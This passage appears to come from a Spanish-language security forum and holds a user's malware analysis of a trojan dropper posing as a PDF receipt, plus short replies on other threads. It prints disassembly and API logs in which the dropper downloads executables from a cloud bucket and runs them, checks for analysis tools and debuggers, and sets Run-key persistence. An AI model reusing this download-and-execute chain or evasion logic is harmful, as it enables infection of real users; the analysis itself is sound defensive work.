LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

En la raiz del disco crea una carpeta oculta y de sistema "wina" donde se alojarán los archivos descargados:

Código:
CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Descarga de archivos y del certificado:





Archivos creados y conexión con URL:



Petición de archivo "sistema.html" no encontrado en el server:



Análisis del archivo "jsob.exe":
Código:
Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Código:
 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Código:
Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Sigue...
883  Seguridad Informática / Seguridad / Re: Ayuda para formatear en bajo nivel en: 14 Febrero 2013, 15:56 pm
Que programa utilizaste, HDD Low Level FormatTool?
Comentas que reconoce el disco pero a la hora de formatear, directamente te aparece la pantalla azul.
Cuando te manda a la pantalla azul ¿que tipo de error sale?
884  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyano Nap en: 14 Febrero 2013, 15:19 pm
Muy bueno el análisis  ;-)
Me gustó el uso de Rootkit Unhooker, me parece una herramienta excelente.

Saludos.
885  Seguridad Informática / Seguridad / Re: Comradex Crypter Fud By dr.fan0 en: 10 Febrero 2013, 11:48 am
Que hacemos entonces, eliminamos el tema?

Esto lo saqué con BSA:
Citar
[ General information ]
   * File name: c:\documents and settings\r32\mis documentos\descargas\comradex crypter\stub_unc.exe

[ Changes to filesystem ]
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Modifies value "SavedLegacySettings=46000000CC0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000CB0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"

[ Network services ]
   * Looks for an Internet connection.

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
